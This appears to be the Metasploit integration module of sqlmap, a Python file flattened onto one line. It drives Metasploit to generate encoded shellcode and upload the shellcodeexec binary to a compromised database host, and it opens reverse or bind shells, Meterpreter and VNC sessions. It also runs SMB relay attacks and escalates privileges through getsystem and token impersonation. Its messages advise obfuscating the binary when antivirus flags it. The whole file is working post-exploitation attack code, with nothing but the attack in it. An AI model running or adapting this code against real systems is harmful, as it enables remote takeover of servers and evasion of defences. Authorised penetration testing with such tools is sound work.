#!/usr/bin/env python """ Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/) See the file 'doc/COPYING' for copying permission """ import os import re import select import sys import tempfile import time from subprocess import PIPE from extra.cloak.cloak import cloak from extra.cloak.cloak import decloak from lib.core.common import dataToStdout from lib.core.common import Backend from lib.core.common import getLocalIP from lib.core.common import getRemoteIP from lib.core.common import getUnicode from lib.core.common import normalizePath from lib.core.common import ntToPosixSlashes from lib.core.common import pollProcess from lib.core.common import randomRange from lib.core.common import randomStr from lib.core.common import readInput from lib.core.data import conf from lib.core.data import kb from lib.core.data import logger from lib.core.data import paths from lib.core.enums import DBMS from lib.core.enums import OS from lib.core.exception import SqlmapDataException from lib.core.exception import SqlmapFilePathException from lib.core.exception import SqlmapGenericException from lib.core.settings import IS_WIN from lib.core.settings import METASPLOIT_SESSION_TIMEOUT from lib.core.settings import SHELLCODEEXEC_RANDOM_STRING_MARKER from lib.core.settings import UNICODE_ENCODING from lib.core.subprocessng import blockingReadFromFD from lib.core.subprocessng import blockingWriteToFD from lib.core.subprocessng import Popen as execute from lib.core.subprocessng import send_all from lib.core.subprocessng import recv_some if IS_WIN: import msvcrt class Metasploit: """ This class defines methods to call Metasploit for plugins. """ def _initVars(self): self.connectionStr = None self.lhostStr = None self.rhostStr = None self.portStr = None self.payloadStr = None self.encoderStr = None self.payloadConnStr = None self.localIP = getLocalIP() self.remoteIP = getRemoteIP() or conf.hostname self._msfCli = normalizePath(os.path.join(conf.msfPath, "msfcli")) self._msfConsole = normalizePath(os.path.join(conf.msfPath, "msfconsole")) self._msfEncode = normalizePath(os.path.join(conf.msfPath, "msfencode")) self._msfPayload = normalizePath(os.path.join(conf.msfPath, "msfpayload")) self._msfVenom = normalizePath(os.path.join(conf.msfPath, "msfvenom")) if IS_WIN: _ = conf.msfPath while _: if os.path.exists(os.path.join(_, "scripts")): _ = os.path.join(_, "scripts", "setenv.bat") break else: old = _ _ = normalizePath(os.path.join(_, "..")) if _ == old: break self._msfCli = "%s & ruby %s" % (_, self._msfCli) self._msfConsole = "%s & ruby %s" % (_, self._msfConsole) self._msfEncode = "ruby %s" % self._msfEncode self._msfPayload = "%s & ruby %s" % (_, self._msfPayload) self._msfVenom = "%s & ruby %s" % (_, self._msfVenom) self._msfPayloadsList = { "windows": { 1: ("Meterpreter (default)", "windows/meterpreter"), 2: ("Shell", "windows/shell"), 3: ("VNC", "windows/vncinject"), }, "linux": { 1: ("Shell (default)", "linux/x86/shell"), 2: ("Meterpreter (beta)", "linux/x86/meterpreter"), } } self._msfConnectionsList = { "windows": { 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), 2: ("Reverse TCP: Try to connect back from the database host to this machine, on all ports between the specified and 65535", "reverse_tcp_allports"), 3: ("Reverse HTTP: Connect back from the database host to this machine tunnelling traffic over HTTP", "reverse_http"), 4: ("Reverse HTTPS: Connect back from the database host to this machine tunnelling traffic over HTTPS", "reverse_https"), 5: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), }, "linux": { 1: ("Reverse TCP: Connect back from the database host to this machine (default)", "reverse_tcp"), 2: ("Bind TCP: Listen on the database host for a connection", "bind_tcp"), } } self._msfEncodersList = { "windows": { 1: ("No Encoder", "generic/none"), 2: ("Alpha2 Alphanumeric Mixedcase Encoder", "x86/alpha_mixed"), 3: ("Alpha2 Alphanumeric Uppercase Encoder", "x86/alpha_upper"), 4: ("Avoid UTF8/tolower", "x86/avoid_utf8_tolower"), 5: ("Call+4 Dword XOR Encoder", "x86/call4_dword_xor"), 6: ("Single-byte XOR Countdown Encoder", "x86/countdown"), 7: ("Variable-length Fnstenv/mov Dword XOR Encoder", "x86/fnstenv_mov"), 8: ("Polymorphic Jump/Call XOR Additive Feedback Encoder", "x86/jmp_call_additive"), 9: ("Non-Alpha Encoder", "x86/nonalpha"), 10: ("Non-Upper Encoder", "x86/nonupper"), 11: ("Polymorphic XOR Additive Feedback Encoder (default)", "x86/shikata_ga_nai"), 12: ("Alpha2 Alphanumeric Unicode Mixedcase Encoder", "x86/unicode_mixed"), 13: ("Alpha2 Alphanumeric Unicode Uppercase Encoder", "x86/unicode_upper"), } } self._msfSMBPortsList = { "windows": { 1: ("139/TCP", "139"), 2: ("445/TCP (default)", "445"), } } self._portData = { "bind": "remote port number", "reverse": "local port number", } def _skeletonSelection(self, msg, lst=None, maxValue=1, default=1): if Backend.isOs(OS.WINDOWS): opSys = "windows" else: opSys = "linux" message = "which %s do you want to use?" % msg if lst: for num, data in lst[opSys].items(): description = data[0] if num > maxValue: maxValue = num if "(default)" in description: default = num message += "\n[%d] %s" % (num, description) else: message += " [%d] " % default choice = readInput(message, default="%d" % default) if not choice: if lst: choice = getUnicode(default, UNICODE_ENCODING) else: return default elif not choice.isdigit(): logger.warn("invalid value, only digits are allowed") return self._skeletonSelection(msg, lst, maxValue, default) elif int(choice) > maxValue or int(choice) < 1: logger.warn("invalid value, it must be a digit between 1 and %d" % maxValue) return self._skeletonSelection(msg, lst, maxValue, default) choice = int(choice) if lst: choice = lst[opSys][choice][1] return choice def _selectSMBPort(self): return self._skeletonSelection("SMB port", self._msfSMBPortsList) def _selectEncoder(self, encode=True): # This is always the case except for --os-bof where the user can # choose which encoder to use. When called from --os-pwn the encoder # is always x86/alpha_mixed - used for sys_bineval() and # shellcodeexec if isinstance(encode, basestring): return encode elif encode: return self._skeletonSelection("payload encoding", self._msfEncodersList) def _selectPayload(self): if Backend.isOs(OS.WINDOWS) and conf.privEsc: infoMsg = "forcing Metasploit payload to Meterpreter because " infoMsg += "it is the only payload that can be used to " infoMsg += "escalate privileges via 'incognito' extension, " infoMsg += "'getsystem' command or post modules" logger.info(infoMsg) _payloadStr = "windows/meterpreter" else: _payloadStr = self._skeletonSelection("payload", self._msfPayloadsList) if _payloadStr == "windows/vncinject": choose = False if Backend.isDbms(DBMS.MYSQL): debugMsg = "by default MySQL on Windows runs as SYSTEM " debugMsg += "user, it is likely that the the VNC " debugMsg += "injection will be successful" logger.debug(debugMsg) elif Backend.isDbms(DBMS.PGSQL): choose = True warnMsg = "by default PostgreSQL on Windows runs as " warnMsg += "postgres user, it is unlikely that the VNC " warnMsg += "injection will be successful" logger.warn(warnMsg) elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): choose = True warnMsg = "it is unlikely that the VNC injection will be " warnMsg += "successful because usually Microsoft SQL Server " warnMsg += "%s runs as Network Service " % Backend.getVersion() warnMsg += "or the Administrator is not logged in" logger.warn(warnMsg) if choose: message = "what do you want to do?\n" message += "[1] Give it a try anyway\n" message += "[2] Fall back to Meterpreter payload (default)\n" message += "[3] Fall back to Shell payload" while True: choice = readInput(message, default="2") if not choice or choice == "2": _payloadStr = "windows/meterpreter" break elif choice == "3": _payloadStr = "windows/shell" break elif choice == "1": if Backend.isDbms(DBMS.PGSQL): logger.warn("beware that the VNC injection might not work") break elif Backend.isDbms(DBMS.MSSQL) and Backend.isVersionWithin(("2005", "2008")): break elif not choice.isdigit(): logger.warn("invalid value, only digits are allowed") elif int(choice) < 1 or int(choice) > 2: logger.warn("invalid value, it must be 1 or 2") if self.connectionStr.startswith("reverse_http") and _payloadStr != "windows/meterpreter": warnMsg = "Reverse HTTP%s connection is only supported " % ("S" if self.connectionStr.endswith("s") else "") warnMsg += "with the Meterpreter payload. Falling back to " warnMsg += "reverse TCP" logger.warn(warnMsg) self.connectionStr = "reverse_tcp" return _payloadStr def _selectPort(self): for connType, connStr in self._portData.items(): if self.connectionStr.startswith(connType): return self._skeletonSelection(connStr, maxValue=65535, default=randomRange(1025, 65535)) def _selectRhost(self): if self.connectionStr.startswith("bind"): message = "what is the back-end DBMS address? [Enter for '%s' (detected)] " % self.remoteIP address = readInput(message, default=self.remoteIP) if not address: address = self.remoteIP return address elif self.connectionStr.startswith("reverse"): return None else: raise SqlmapDataException("unexpected connection type") def _selectLhost(self): if self.connectionStr.startswith("reverse"): message = "what is the local address? [Enter for '%s' (detected)] " % self.localIP address = readInput(message, default=self.localIP) if not address: address = self.localIP return address elif self.connectionStr.startswith("bind"): return None else: raise SqlmapDataException("unexpected connection type") def _selectConnection(self): return self._skeletonSelection("connection type", self._msfConnectionsList) def _prepareIngredients(self, encode=True): self.connectionStr = self._selectConnection() self.lhostStr = self._selectLhost() self.rhostStr = self._selectRhost() self.portStr = self._selectPort() self.payloadStr = self._selectPayload() self.encoderStr = self._selectEncoder(encode) self.payloadConnStr = "%s/%s" % (self.payloadStr, self.connectionStr) def _forgeMsfCliCmd(self, exitfunc="process"): if kb.oldMsf: self._cliCmd = "%s multi/handler PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) self._cliCmd += " EXITFUNC=%s" % exitfunc self._cliCmd += " LPORT=%s" % self.portStr if self.connectionStr.startswith("bind"): self._cliCmd += " RHOST=%s" % self.rhostStr elif self.connectionStr.startswith("reverse"): self._cliCmd += " LHOST=%s" % self.lhostStr else: raise SqlmapDataException("unexpected connection type") if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": self._cliCmd += " DisableCourtesyShell=true" self._cliCmd += " E" else: self._cliCmd = "%s -x 'use multi/handler; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) self._cliCmd += "; set EXITFUNC %s" % exitfunc self._cliCmd += "; set LPORT %s" % self.portStr if self.connectionStr.startswith("bind"): self._cliCmd += "; set RHOST %s" % self.rhostStr elif self.connectionStr.startswith("reverse"): self._cliCmd += "; set LHOST %s" % self.lhostStr else: raise SqlmapDataException("unexpected connection type") if Backend.isOs(OS.WINDOWS) and self.payloadStr == "windows/vncinject": self._cliCmd += "; set DisableCourtesyShell true" self._cliCmd += "; exploit'" def _forgeMsfCliCmdForSmbrelay(self): self._prepareIngredients(encode=False) if kb.oldMsf: self._cliCmd = "%s windows/smb/smb_relay PAYLOAD=%s" % (self._msfCli, self.payloadConnStr) self._cliCmd += " EXITFUNC=thread" self._cliCmd += " LPORT=%s" % self.portStr self._cliCmd += " SRVHOST=%s" % self.lhostStr self._cliCmd += " SRVPORT=%s" % self._selectSMBPort() if self.connectionStr.startswith("bind"): self._cliCmd += " RHOST=%s" % self.rhostStr elif self.connectionStr.startswith("reverse"): self._cliCmd += " LHOST=%s" % self.lhostStr else: raise SqlmapDataException("unexpected connection type") self._cliCmd += " E" else: self._cliCmd = "%s -x 'use windows/smb/smb_relay; set PAYLOAD %s" % (self._msfConsole, self.payloadConnStr) self._cliCmd += "; set EXITFUNC thread" self._cliCmd += "; set LPORT %s" % self.portStr self._cliCmd += "; set SRVHOST %s" % self.lhostStr self._cliCmd += "; set SRVPORT %s" % self._selectSMBPort() if self.connectionStr.startswith("bind"): self._cliCmd += "; set RHOST %s" % self.rhostStr elif self.connectionStr.startswith("reverse"): self._cliCmd += "; set LHOST %s" % self.lhostStr else: raise SqlmapDataException("unexpected connection type") self._cliCmd += "; exploit'" def _forgeMsfPayloadCmd(self, exitfunc, format, outFile, extra=None): if kb.oldMsf: self._payloadCmd = self._msfPayload else: self._payloadCmd = "%s -p" % self._msfVenom self._payloadCmd += " %s" % self.payloadConnStr self._payloadCmd += " EXITFUNC=%s" % exitfunc self._payloadCmd += " LPORT=%s" % self.portStr if self.connectionStr.startswith("reverse"): self._payloadCmd += " LHOST=%s" % self.lhostStr elif not self.connectionStr.startswith("bind"): raise SqlmapDataException("unexpected connection type") if Backend.isOs(OS.LINUX) and conf.privEsc: self._payloadCmd += " PrependChrootBreak=true PrependSetuid=true" if kb.oldMsf: if extra == "BufferRegister=EAX": self._payloadCmd += " R | %s -a x86 -e %s -o \"%s\" -t %s" % (self._msfEncode, self.encoderStr, outFile, format) if extra is not None: self._payloadCmd += " %s" % extra else: self._payloadCmd += " X > \"%s\"" % outFile else: if extra == "BufferRegister=EAX": self._payloadCmd += " -a x86 -e %s -f %s" % (self.encoderStr, format) if extra is not None: self._payloadCmd += " %s" % extra self._payloadCmd += " > \"%s\"" % outFile else: self._payloadCmd += " -f exe > \"%s\"" % outFile def _runMsfCliSmbrelay(self): self._forgeMsfCliCmdForSmbrelay() infoMsg = "running Metasploit Framework command line " infoMsg += "interface locally, please wait.." logger.info(infoMsg) logger.debug("executing local command: %s" % self._cliCmd) self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) def _runMsfCli(self, exitfunc): self._forgeMsfCliCmd(exitfunc) infoMsg = "running Metasploit Framework command line " infoMsg += "interface locally, please wait.." logger.info(infoMsg) logger.debug("executing local command: %s" % self._cliCmd) self._msfCliProc = execute(self._cliCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) def _runMsfShellcodeRemote(self): infoMsg = "running Metasploit Framework shellcode " infoMsg += "remotely via UDF 'sys_bineval', please wait.." logger.info(infoMsg) self.udfExecCmd("'%s'" % self.shellcodeString, silent=True, udfName="sys_bineval") def _runMsfShellcodeRemoteViaSexec(self): infoMsg = "running Metasploit Framework shellcode remotely " infoMsg += "via shellcodeexec, please wait.." logger.info(infoMsg) if not Backend.isOs(OS.WINDOWS): self.execCmd("chmod +x %s" % self.shellcodeexecRemote, silent=True) cmd = "%s %s &" % (self.shellcodeexecRemote, self.shellcodeString) else: cmd = "\"%s\" %s" % (self.shellcodeexecRemote, self.shellcodeString) self.execCmd(cmd, silent=True) def _loadMetExtensions(self, proc, metSess): if not Backend.isOs(OS.WINDOWS): return send_all(proc, "use espia\n") send_all(proc, "use incognito\n") # This extension is loaded by default since Metasploit > 3.7 #send_all(proc, "use priv\n") # This extension freezes the connection on 64-bit systems #send_all(proc, "use sniffer\n") send_all(proc, "sysinfo\n") send_all(proc, "getuid\n") if conf.privEsc: print infoMsg = "trying to escalate privileges using Meterpreter " infoMsg += "'getsystem' command which tries different " infoMsg += "techniques, including kitrap0d" logger.info(infoMsg) send_all(proc, "getsystem\n") infoMsg = "displaying the list of Access Tokens availables. " infoMsg += "Choose which user you want to impersonate by " infoMsg += "using incognito's command 'impersonate_token' if " infoMsg += "'getsystem' does not success to elevate privileges" logger.info(infoMsg) send_all(proc, "list_tokens -u\n") send_all(proc, "getuid\n") def _controlMsfCmd(self, proc, func): initialized = False start_time = time.time() stdin_fd = sys.stdin.fileno() while True: returncode = proc.poll() if returncode is None: # Child hasn't exited yet pass else: logger.debug("connection closed properly") return returncode try: if IS_WIN: timeout = 3 inp = "" _ = time.time() while True: if msvcrt.kbhit(): char = msvcrt.getche() if ord(char) == 13: # enter_key break elif ord(char) >= 32: # space_char inp += char if len(inp) == 0 and (time.time() - _) > timeout: break if len(inp) > 0: try: send_all(proc, inp) except (EOFError, IOError): # Probably the child has exited pass else: ready_fds = select.select([stdin_fd], [], [], 1) if stdin_fd in ready_fds[0]: try: send_all(proc, blockingReadFromFD(stdin_fd)) except (EOFError, IOError): # Probably the child has exited pass out = recv_some(proc, t=.1, e=0) blockingWriteToFD(sys.stdout.fileno(), out) # For --os-pwn and --os-bof pwnBofCond = self.connectionStr.startswith("reverse") pwnBofCond &= "Starting the payload handler" in out # For --os-smbrelay smbRelayCond = "Server started" in out if pwnBofCond or smbRelayCond: func() timeout = time.time() - start_time > METASPLOIT_SESSION_TIMEOUT if not initialized: match = re.search("Meterpreter session ([\d]+) opened", out) if match: self._loadMetExtensions(proc, match.group(1)) if "shell" in self.payloadStr: send_all(proc, "whoami\n" if Backend.isOs(OS.WINDOWS) else "uname -a ; id\n") time.sleep(2) initialized = True elif timeout: proc.kill() errMsg = "timeout occurred while attempting " errMsg += "to open a remote session" raise SqlmapGenericException(errMsg) if conf.liveTest and timeout: if initialized: send_all(proc, "exit\n") time.sleep(2) else: proc.kill() except (EOFError, IOError, select.error): return proc.returncode def createMsfShellcode(self, exitfunc, format, extra, encode): infoMsg = "creating Metasploit Framework multi-stage shellcode " logger.info(infoMsg) self._randStr = randomStr(lowercase=True) self._shellcodeFilePath = os.path.join(conf.outputPath, "tmpm%s" % self._randStr) Metasploit._initVars(self) self._prepareIngredients(encode=encode) self._forgeMsfPayloadCmd(exitfunc, format, self._shellcodeFilePath, extra) logger.debug("executing local command: %s" % self._payloadCmd) process = execute(self._payloadCmd, shell=True, stdin=PIPE, stdout=PIPE, stderr=PIPE, close_fds=False) dataToStdout("\r[%s] [INFO] creation in progress " % time.strftime("%X")) pollProcess(process) payloadStderr = process.communicate()[1] match = re.search("(Total size:|Length:|succeeded with size|Final size of exe file:) ([\d]+)", payloadStderr) if match: payloadSize = int(match.group(2)) if extra == "BufferRegister=EAX": payloadSize = payloadSize / 2 debugMsg = "the shellcode size is %d bytes" % payloadSize logger.debug(debugMsg) else: errMsg = "failed to create the shellcode (%s)" % payloadStderr.replace("\n", " ").replace("\r", "") raise SqlmapFilePathException(errMsg) self._shellcodeFP = open(self._shellcodeFilePath, "rb") self.shellcodeString = self._shellcodeFP.read() self._shellcodeFP.close() os.unlink(self._shellcodeFilePath) def uploadShellcodeexec(self, web=False): self.shellcodeexecLocal = os.path.join(paths.SQLMAP_EXTRAS_PATH, "shellcodeexec") if Backend.isOs(OS.WINDOWS): self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "windows", "shellcodeexec.x%s.exe_" % "32") content = decloak(self.shellcodeexecLocal) if SHELLCODEEXEC_RANDOM_STRING_MARKER in content: content = content.replace(SHELLCODEEXEC_RANDOM_STRING_MARKER, randomStr(len(SHELLCODEEXEC_RANDOM_STRING_MARKER))) _ = cloak(data=content) handle, self.shellcodeexecLocal = tempfile.mkstemp(suffix="%s.exe_" % "32") os.close(handle) with open(self.shellcodeexecLocal, "w+b") as f: f.write(_) else: self.shellcodeexecLocal = os.path.join(self.shellcodeexecLocal, "linux", "shellcodeexec.x%s_" % Backend.getArch()) __basename = "tmpse%s%s" % (self._randStr, ".exe" if Backend.isOs(OS.WINDOWS) else "") self.shellcodeexecRemote = "%s/%s" % (conf.tmpPath, __basename) self.shellcodeexecRemote = ntToPosixSlashes(normalizePath(self.shellcodeexecRemote)) logger.info("uploading shellcodeexec to '%s'" % self.shellcodeexecRemote) if web: written = self.webUpload(self.shellcodeexecRemote, os.path.split(self.shellcodeexecRemote)[0], filepath=self.shellcodeexecLocal) else: written = self.writeFile(self.shellcodeexecLocal, self.shellcodeexecRemote, "binary", forceCheck=True) if written is not True: errMsg = "there has been a problem uploading shellcodeexec, it " errMsg += "looks like the binary file has not been written " errMsg += "on the database underlying file system or an AV has " errMsg += "flagged it as malicious and removed it. In such a case " errMsg += "it is recommended to recompile shellcodeexec with " errMsg += "slight modification to the source code or pack it " errMsg += "with an obfuscator software" logger.error(errMsg) return False else: logger.info("shellcodeexec successfully uploaded") return True def pwn(self, goUdf=False): if goUdf: exitfunc = "thread" func = self._runMsfShellcodeRemote else: exitfunc = "process" func = self._runMsfShellcodeRemoteViaSexec self._runMsfCli(exitfunc=exitfunc) if self.connectionStr.startswith("bind"): func() debugMsg = "Metasploit Framework command line interface exited " debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, func) logger.debug(debugMsg) if not goUdf: time.sleep(1) self.delRemoteFile(self.shellcodeexecRemote) def smb(self): Metasploit._initVars(self) self._randFile = "tmpu%s.txt" % randomStr(lowercase=True) self._runMsfCliSmbrelay() if Backend.getIdentifiedDbms() in (DBMS.MYSQL, DBMS.PGSQL): self.uncPath = "\\\\\\\\%s\\\\%s" % (self.lhostStr, self._randFile) else: self.uncPath = "\\\\%s\\%s" % (self.lhostStr, self._randFile) debugMsg = "Metasploit Framework console exited with return " debugMsg += "code %s" % self._controlMsfCmd(self._msfCliProc, self.uncPathRequest) logger.debug(debugMsg) def bof(self): self._runMsfCli(exitfunc="seh") if self.connectionStr.startswith("bind"): self.spHeapOverflow() debugMsg = "Metasploit Framework command line interface exited " debugMsg += "with return code %s" % self._controlMsfCmd(self._msfCliProc, self.spHeapOverflow) logger.debug(debugMsg)